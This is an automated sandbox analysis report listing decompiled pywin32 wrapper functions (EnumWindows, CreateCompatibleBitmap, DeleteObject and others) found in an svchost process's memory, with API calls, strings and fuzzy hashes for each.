                            • Instruction ID: cd1678b7c1677b50e54700dd1bfc3de4f6b618bc059705d16c47ee818d5d38e2
                            • Opcode Fuzzy Hash: 304058409bd8efd9c0d9bcb3713a38c49b267b07b915a7f07df467f09f9f7808
                            • Instruction Fuzzy Hash: CD2190B401C302AFDB10CF50CC44B6B7BF8BB49305F548829F8A9DA150EB75DA99CB5A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA74F0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72COMMON
                            Download Yara Rule
                            APIs
                            • PyGILState_Ensure.PYTHON38 ref: 6DAA7513
                            • ?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z.PYWINTYPES38(?,00000000), ref: 6DAA7533
                            • Py_BuildValue.PYTHON38((NO),00000000), ref: 6DAA7542
                            • PyEval_CallObjectWithKeywords.PYTHON38(?,00000000,00000000), ref: 6DAA7556
                            • _Py_Dealloc.PYTHON38(00000000), ref: 6DAA7567
                            • PyLong_AsLong.PYTHON38(00000000), ref: 6DAA757D
                            • PyErr_Occurred.PYTHON38 ref: 6DAA758D
                            • _Py_Dealloc.PYTHON38(-000000FF), ref: 6DAA75A0
                            • PyGILState_Release.PYTHON38(?), ref: 6DAA75B0
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: DeallocLong_State_$BuildCallEnsureErr_Eval_FromKeywordsLongObjectOccurredReleaseU_object@@ValueWith
                            • String ID: (NO)
                            • API String ID: 3912475454-194327457
                            • Opcode ID: d8bbdf8305b390948e5654205ec9e03c8f77a485555530453dcb84f18592efa5
                            • Instruction ID: e2ccfe4b15a92dff3cd1cc59c010d5148e8ce8cc908e1d4cffb6f3dc041ea4d0
                            • Opcode Fuzzy Hash: d8bbdf8305b390948e5654205ec9e03c8f77a485555530453dcb84f18592efa5
                            • Instruction Fuzzy Hash: B121B075C082069FDB005F68CC8976ABBB8FB06331F184335EC26932A0D7755D638AA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB5DA0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 66COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOi:GetUpdateRgn,00000000,?), ref: 6DAB5DCA
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB5DEB
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB5DFD
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: GetUpdateRgn$OOi:GetUpdateRgn
                            • API String ID: 1248562531-2548639082
                            • Opcode ID: b81f3914d36704e0bdea8af9805e9471f97c243b86a4b1153fdcbf98cb5aba1c
                            • Instruction ID: 16d45d5b44b63412da20775475a63e1792142ed64c12b5a79bfde39ddc0cb197
                            • Opcode Fuzzy Hash: b81f3914d36704e0bdea8af9805e9471f97c243b86a4b1153fdcbf98cb5aba1c
                            • Instruction Fuzzy Hash: 54119375408302AFDB01DB18DC45BAB3BBDBF84215F888939FC85C1131F331D56A8AA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA75D0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 58threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,6DABDE58,?,?), ref: 6DAA75E6
                            • PyCallable_Check.PYTHON38 ref: 6DAA75F6
                            • PyErr_SetString.PYTHON38(6E28ED8C,First param must be a callable object), ref: 6DAA760F
                            • PyEval_SaveThread.PYTHON38 ref: 6DAA762F
                            • EnumWindows.USER32(Function_000074F0,?), ref: 6DAA7641
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAA764A
                            • PyErr_Occurred.PYTHON38 ref: 6DAA7659
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(EnumWindows,00000000), ref: 6DAA7669
                            Strings
                            • First param must be a callable object, xrefs: 6DAA7608
                            • EnumWindows, xrefs: 6DAA7664
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Err_Eval_Thread$Arg_Callable_CheckEnumError@@OccurredParseRestoreSaveStringTupleU_object@@Win_Windows
                            • String ID: EnumWindows$First param must be a callable object
                            • API String ID: 88214000-2284451218
                            • Opcode ID: 5e654e07c0436561106657b33f0f5223ed7f50d74184a0d707adec1f78752c35
                            • Instruction ID: 22add96ac7bb2298ec65701da42f28904e368854af9b60f477f0d25105b9b743
                            • Opcode Fuzzy Hash: 5e654e07c0436561106657b33f0f5223ed7f50d74184a0d707adec1f78752c35
                            • Instruction Fuzzy Hash: 1311427590C3059FDB00AF69CC88A2A77F9FF55205F488A65F945C3222E730D917CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB10C0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 58threadwindowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 30%
                            			E6DAB10C0(intOrPtr _a8) {
				struct HDC__* _v4;
				int _v8;
				int _v12;
				long _v16;
				long* _t12;
				struct HDC__** _t13;
				struct HBITMAP__* _t15;
				long _t17;
				void* _t18;
				void* _t19;
				void* _t23;

				_v16 = 0;
				_t12 =  &_v16;
				__imp__PyArg_ParseTuple(_a8, "Oii:CreateCompatibleBitmap", _t12,  &_v8,  &_v12);
				if(_t12 != 0) {
					_t13 =  &_v4;
					__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v16, _t13);
					if(_t13 == 0) {
						goto L1;
					} else {
						__imp__PyEval_SaveThread(_t19, _t23);
						SetLastError(0);
						_t15 = CreateCompatibleBitmap(_v4, _v8, _v12);
						_t20 = _t15;
						__imp__PyEval_RestoreThread(_t13);
						if(_t15 != 0) {
							L6:
							return E6DAA5630(_t18, _t20);
						} else {
							_t17 = GetLastError();
							if(_t17 == 0) {
								goto L6;
							} else {
								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("CreateCompatibleBitmap", _t17);
								return _t17;
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}














                            0x6dab10c7
                            0x6dab10d4
                            0x6dab10e2
                            0x6dab10ed
                            0x6dab10f5
                            0x6dab10fe
                            0x6dab1109
                            0x00000000
                            0x6dab110b
                            0x6dab110d
                            0x6dab1117
                            0x6dab1129
                            0x6dab1130
                            0x6dab1132
                            0x6dab113d
                            0x6dab115e
                            0x6dab116c
                            0x6dab113f
                            0x6dab113f
                            0x6dab1147
                            0x00000000
                            0x6dab1149
                            0x6dab114f
                            0x6dab115d
                            0x6dab115d
                            0x6dab1147
                            0x6dab113d
                            0x6dab10ef
                            0x6dab10ef
                            0x6dab10f4
                            0x6dab10f4

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oii:CreateCompatibleBitmap,?,?,?), ref: 6DAB10E2
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB10FE
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB110D
                            • SetLastError.KERNEL32(00000000), ref: 6DAB1117
                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 6DAB1129
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB1132
                            • GetLastError.KERNEL32 ref: 6DAB113F
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(CreateCompatibleBitmap,00000000), ref: 6DAB114F
                            Strings
                            • CreateCompatibleBitmap, xrefs: 6DAB114A
                            • Oii:CreateCompatibleBitmap, xrefs: 6DAB10D9
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorEval_LastThreadU_object@@$Arg_BitmapCompatibleCreateError@@Object_ParseRestoreSaveTupleWin_
                            • String ID: CreateCompatibleBitmap$Oii:CreateCompatibleBitmap
                            • API String ID: 3808850150-1912056031
                            • Opcode ID: be256af2d13c6025603100efd03d13c7d8535c81cc031f4bc9487d9e75b82e11
                            • Instruction ID: 83d53ade5720f2968066441ee0bb811ec4f194631688fbf5ec09185e50889aa9
                            • Opcode Fuzzy Hash: be256af2d13c6025603100efd03d13c7d8535c81cc031f4bc9487d9e75b82e11
                            • Instruction Fuzzy Hash: 4011C27650C201AFDB00AB68DC49BBB7BBCFF85215F488968F955C1121E731C56B8BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAF1C0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 55threadCOMMON
                            Download Yara Rule
                            C-Code - Quality: 21%
                            			E6DAAF1C0(intOrPtr _a8) {
				int _v4;
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				int* _t15;
				long _t16;
				void* _t17;
				long _t18;
				void* _t21;

				_t15 =  &_v4;
				__imp__PyArg_ParseTuple(_a8, "iiiii:ImageList_Create", _t15,  &_v8,  &_v12,  &_v16,  &_v20);
				if(_t15 != 0) {
					__imp__PyEval_SaveThread(_t17, _t21);
					SetLastError(0);
					_t16 = ImageList_Create(_v4, _v8, _v12, _v16, _v20);
					_t18 = _t16;
					__imp__PyEval_RestoreThread(_t15);
					if(_t18 != 0) {
						L5:
						__imp__?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z(_t18);
						return _t16;
					} else {
						_t16 = GetLastError();
						if(_t16 == 0) {
							goto L5;
						} else {
							__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("ImageList_Create", _t16);
							return _t16;
						}
					}
				} else {
					return _t15;
				}
			}













                            0x6daaf1d6
                            0x6daaf1e4
                            0x6daaf1ef
                            0x6daaf1f7
                            0x6daaf201
                            0x6daaf21b
                            0x6daaf222
                            0x6daaf224
                            0x6daaf22f
                            0x6daaf250
                            0x6daaf251
                            0x6daaf25f
                            0x6daaf231
                            0x6daaf231
                            0x6daaf239
                            0x00000000
                            0x6daaf23b
                            0x6daaf241
                            0x6daaf24f
                            0x6daaf24f
                            0x6daaf239
                            0x6daaf1f4
                            0x6daaf1f4
                            0x6daaf1f4

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,iiiii:ImageList_Create,?,?,?,?), ref: 6DAAF1E4
                            • PyEval_SaveThread.PYTHON38 ref: 6DAAF1F7
                            • SetLastError.KERNEL32(00000000), ref: 6DAAF201
                            • ImageList_Create.COMCTL32(?,?,?,?,?), ref: 6DAAF21B
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAAF224
                            • GetLastError.KERNEL32 ref: 6DAAF231
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(ImageList_Create,00000000), ref: 6DAAF241
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorEval_LastThread$Arg_CreateError@@ImageList_ParseRestoreSaveTupleU_object@@Win_
                            • String ID: ImageList_Create$iiiii:ImageList_Create
                            • API String ID: 922996389-44447952
                            • Opcode ID: 8b6fb5b631ac3a90f20f917a84cf78ea471fd62ede8db8321b71b8e5f6725c75
                            • Instruction ID: eb046b7729252a20a9a112d54129394b38c1e5c625690c8b7dcba5ae50c7f313
                            • Opcode Fuzzy Hash: 8b6fb5b631ac3a90f20f917a84cf78ea471fd62ede8db8321b71b8e5f6725c75
                            • Instruction Fuzzy Hash: 55018676408201AFCB01AF58CC48AAB3BBDFF85241F48466DF555C1031E735C15A9BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA5130, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                            Download Yara Rule
                            APIs
                            • PySequence_Tuple.PYTHON38(?), ref: 6DAA516B
                            • PyArg_ParseTuple.PYTHON38(00000000,OOH|(hhhh)kkO:DLGITEMTEMPLATE,?,?,?,?,?,?,?,?,?,?), ref: 6DAA51B8
                            • ?PyWinObject_AsResourceIdW@@YAHPAU_object@@PAPA_WH@Z.PYWINTYPES38(?,?,00000000), ref: 6DAA51D4
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000001,00000000), ref: 6DAA51EE
                            • ?PyWinObject_AsReadBuffer@@YAHPAU_object@@PAPAXPAKH@Z.PYWINTYPES38(?,?,?,00000001), ref: 6DAA520B
                            • ?PyWinObject_FreeResourceId@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DAA5255
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DAA525F
                            • _Py_Dealloc.PYTHON38(-000000FF), ref: 6DAA526E
                            Strings
                            • OOH|(hhhh)kkO:DLGITEMTEMPLATE, xrefs: 6DAA51B2
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_$U_object@@$FreeResourceTuple$Arg_Buffer@@DeallocId@@ParseReadSequence_
                            • String ID: OOH|(hhhh)kkO:DLGITEMTEMPLATE
                            • API String ID: 3797210680-3713364502
                            • Opcode ID: 71ca8ec640e883acc109953b3744dc0444645b96d0a89ad7822591cb5b727834
                            • Instruction ID: dad17c47f92904d90fa0d87992b2efec02b4b7e2d7c66007409b20ed6439e80e
                            • Opcode Fuzzy Hash: 71ca8ec640e883acc109953b3744dc0444645b96d0a89ad7822591cb5b727834
                            • Instruction Fuzzy Hash: CC412BB2408345AFD701CF65C884AAFB7FCFF89210F484A2EF699D2120E731D55A8B56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA80A0, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 80COMMON
                            Download Yara Rule
                            C-Code - Quality: 24%
                            			E6DAA80A0(intOrPtr _a8) {
				void* _v4;
				void* _t10;
				void** _t13;
				int _t14;
				signed int _t18;
				signed int _t19;
				void* _t21;
				intOrPtr _t23;
				void* _t25;
				intOrPtr _t26;
				intOrPtr* _t27;
				intOrPtr _t28;
				void* _t29;
				char* _t30;
				void* _t32;
				intOrPtr* _t33;
				void* _t38;

				_t10 = _t32;
				__imp__PyArg_ParseTuple(_a8, "O:DeleteObject", _t10);
				_t33 = _t32 + 0xc;
				if(_t10 == 0) {
					L11:
					return 0;
				} else {
					_t23 =  *_t33;
					_t38 =  *((intOrPtr*)(_t23 + 4)) - __imp__?PyHANDLEType@@3U_typeobject@@A; // 0x6e98bc00
					if(_t38 != 0) {
						_t13 =  &_v4;
						__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_t23, _t13);
						if(_t13 == 0) {
							goto L11;
						} else {
							_t14 = DeleteObject(_v4);
							if(_t14 != 0) {
								goto L20;
							} else {
								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("DeleteObject", _t14);
								return _t14;
							}
						}
					} else {
						_t30 = "PyGdiHANDLE";
						_t18 =  *((intOrPtr*)( *((intOrPtr*)(_t23 - 4)) + 8))(_t29);
						asm("o16 nop [eax+eax]");
						while(1) {
							_t25 =  *_t18;
							if(_t25 !=  *_t30) {
								break;
							}
							if(_t25 == 0) {
								L7:
								_t19 = 0;
							} else {
								_t28 =  *((intOrPtr*)(_t18 + 1));
								if(_t28 != _t30[1]) {
									break;
								} else {
									_t18 = _t18 + 2;
									_t30 =  &(_t30[2]);
									if(_t28 != 0) {
										continue;
									} else {
										goto L7;
									}
								}
							}
							L9:
							if(_t19 == 0) {
								_t26 =  *_t33;
								if(_t26 == 0) {
									_t27 = 0;
								} else {
									_t27 = _t26 + 0xfffffffc;
								}
								_t21 =  *((intOrPtr*)( *_t27 + 4))();
								if(_t21 != 0) {
									L20:
									 *__imp___Py_NoneStruct =  *__imp___Py_NoneStruct + 1;
									return __imp___Py_NoneStruct;
								} else {
									return _t21;
								}
							} else {
								__imp__PyErr_SetString( *__imp__PyExc_TypeError, "DeleteObject requires a PyGdiHANDLE");
								goto L11;
							}
							goto L21;
						}
						asm("sbb eax, eax");
						_t19 = _t18 | 0x00000001;
						goto L9;
					}
				}
				L21:
			}




















                            0x6daa80a3
                            0x6daa80b0
                            0x6daa80b6
                            0x6daa80bb
                            0x6daa811f
                            0x6daa8124
                            0x6daa80bd
                            0x6daa80bd
                            0x6daa80c3
                            0x6daa80c9
                            0x6daa8140
                            0x6daa8146
                            0x6daa8151
                            0x00000000
                            0x6daa8153
                            0x6daa8157
                            0x6daa815f
                            0x00000000
                            0x6daa8161
                            0x6daa8167
                            0x6daa8173
                            0x6daa8173
                            0x6daa815f
                            0x6daa80cb
                            0x6daa80d2
                            0x6daa80d7
                            0x6daa80da
                            0x6daa80e0
                            0x6daa80e0
                            0x6daa80e4
                            0x00000000
                            0x00000000
                            0x6daa80e8
                            0x6daa80fc
                            0x6daa80fc
                            0x6daa80ea
                            0x6daa80ea
                            0x6daa80f0
                            0x00000000
                            0x6daa80f2
                            0x6daa80f2
                            0x6daa80f5
                            0x6daa80fa
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x6daa80fa
                            0x6daa80f0
                            0x6daa8105
                            0x6daa8108
                            0x6daa8125
                            0x6daa812a
                            0x6daa8131
                            0x6daa812c
                            0x6daa812c
                            0x6daa812c
                            0x6daa8135
                            0x6daa813a
                            0x6daa8174
                            0x6daa8179
                            0x6daa8183
                            0x6daa813f
                            0x6daa813f
                            0x6daa813f
                            0x6daa810a
                            0x6daa8116
                            0x00000000
                            0x6daa811c
                            0x00000000
                            0x6daa8108
                            0x6daa8100
                            0x6daa8102
                            0x00000000
                            0x6daa8102
                            0x6daa80c9
                            0x00000000

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:DeleteObject), ref: 6DAA80B0
                            • PyErr_SetString.PYTHON38(6E28ED8C,DeleteObject requires a PyGdiHANDLE), ref: 6DAA8116
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA8146
                            • DeleteObject.GDI32(?), ref: 6DAA8157
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(DeleteObject,00000000), ref: 6DAA8167
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_DeleteErr_Error@@ObjectObject_ParseStringTupleWin_
                            • String ID: DeleteObject$DeleteObject requires a PyGdiHANDLE$O:DeleteObject$PyGdiHANDLE
                            • API String ID: 634653252-1735475675
                            • Opcode ID: 436d2755733059f5db86e3c882af02310fffbe7f7e09ad1bb6cb445dbfdde1a2
                            • Instruction ID: 21813dbd99a7127671466d530b025be086ffca121ac819b103a7b07ae0b2cda3
                            • Opcode Fuzzy Hash: 436d2755733059f5db86e3c882af02310fffbe7f7e09ad1bb6cb445dbfdde1a2
                            • Instruction Fuzzy Hash: 6621B678A0C2819FCB009F38DC55A767BF5BF02205B4C8768E845C71A2E732C996C661
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB15B0, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 75COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOiiiii:SetWindowPos,?,?,?,?,?,?), ref: 6DAB15EE
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB160F
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB1621
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: OOiiiii:SetWindowPos$SetWindowPos
                            • API String ID: 1248562531-1125080933
                            • Opcode ID: 9a200d0c54f39d9dfb85a2683544d573e5846eba70e63dc9df68f9b7da16597e
                            • Instruction ID: 9f74d0950ee042d029fd269935dc0f0e8f79f514ee5e27987ccc33f8f5746790
                            • Opcode Fuzzy Hash: 9a200d0c54f39d9dfb85a2683544d573e5846eba70e63dc9df68f9b7da16597e
                            • Instruction Fuzzy Hash: 9D21327240C305AFCB019F54CC90EAB7BFDFF88244F484A29F98991121E731D59A9B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB18C0, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 70threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(00000000,OOO:TranslateAccelerator,00000000,?,?), ref: 6DAB18F1
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(00000000,?), ref: 6DAB1916
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(00000000,?), ref: 6DAB1926
                            • ?PyWinObject_AsMSG@@YAHPAU_object@@PAUtagMSG@@@Z.PYWINTYPES38(?), ref: 6DAB193F
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB194C
                            • TranslateAcceleratorW.USER32(?,?), ref: 6DAB195B
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB1964
                            • Py_BuildValue.PYTHON38(6DABFF68,00000000), ref: 6DAB1970
                            Strings
                            • OOO:TranslateAccelerator, xrefs: 6DAB18E9
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Eval_Thread$AcceleratorArg_BuildG@@@ParseRestoreSaveTranslateTupleUtagValue
                            • String ID: OOO:TranslateAccelerator
                            • API String ID: 3680090832-1379186118
                            • Opcode ID: c714ff13a27a82a4fb6c572deb4ed5a1093459ee09207b4dea7897e4c599df34
                            • Instruction ID: dcc6dc7cea2c9e6c032869ae1c51e093ffb0d05812ccb988c3a9f0f9fb192e8c
                            • Opcode Fuzzy Hash: c714ff13a27a82a4fb6c572deb4ed5a1093459ee09207b4dea7897e4c599df34
                            • Instruction Fuzzy Hash: 13115C75D04209AFDF109BA5DC49BEFBBBCEF05215F044265EC14E2121E7319A66CAE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA920F0, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 68COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOOi:SignalObjectAndWait,?,?,?), ref: 6DA92127
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DA92148
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DA9215A
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DA92167
                            • PyErr_Occurred.PYTHON38 ref: 6DA92177
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_Err_LongLong_MaskOccurredParseTupleUnsigned
                            • String ID: OOOi:SignalObjectAndWait$SignalObjectAndWait
                            • API String ID: 3610075487-2586135881
                            • Opcode ID: 4aad3cf55c5947ccfb6d292ebda7a2d13e79b6590e388cef4989fa3664d4252c
                            • Instruction ID: 91686b80b0ec85cc3a5eb22893c4e5b98c737b18d05452b5cebd61549eccffd9
                            • Opcode Fuzzy Hash: 4aad3cf55c5947ccfb6d292ebda7a2d13e79b6590e388cef4989fa3664d4252c
                            • Instruction Fuzzy Hash: CE11C07541C202AFDB10EF58DC40BABBBF8EF48214F94846AFCA885150F731D5698AD6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA85C0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 67threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O(ii(ii)(ii)(iiii)):SetWindowPlacement,?,?,?,?,?,?,?,?,?,?,?), ref: 6DAA860B
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA8627
                            • PyEval_SaveThread.PYTHON38 ref: 6DAA8636
                            • SetWindowPlacement.USER32(?,?), ref: 6DAA8647
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAA8650
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetWindowPlacement,00000000), ref: 6DAA8666
                            Strings
                            Memory Dump Source
